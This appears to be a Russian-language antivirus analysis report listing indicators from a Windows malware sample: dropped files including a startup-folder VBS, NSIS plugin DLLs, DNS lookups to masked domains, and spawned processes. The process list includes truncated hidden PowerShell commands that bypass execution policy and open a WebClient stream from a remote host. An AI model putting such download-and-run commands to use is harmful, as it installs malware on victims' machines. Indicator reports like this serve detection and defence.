Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\network.vbs
- %TEMP%\bb.vbs
- %TEMP%\installer.exe
- %TEMP%\nsm4eff.tmp
- %TEMP%\nsb4f0f.tmp\nsishelper.dll
- %TEMP%\nsb4f0f.tmp\system.dll
- %TEMP%\nsb4f0f.tmp\userinfo.dll
- %TEMP%\nsb4f0f.tmp\nsisdl.dll
- %TEMP%\nsb4f0f.tmp\inst_start
- %TEMP%\nsb4f0f.tmp\modern-header.bmp
- %TEMP%\nsb4f0f.tmp\nsdialogs.dll
- %TEMP%\outofprocreport1325477.txt
- %TEMP%\nsb4f0f.tmp\inst_start
- http://www.yo######ownloadersite.com/images/pixel.gif?ac#########################################################################################################################################
- DNS ASK yo######ownloadersite.com
- DNS ASK 6.###4top.net
- '<SYSTEM32>\wscript.exe' "%TEMP%\bb.vbs"
- '%TEMP%\installer.exe'
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://6.top4to...
- '<SYSTEM32>\wermgr.exe' "-outproc" "908" "1284"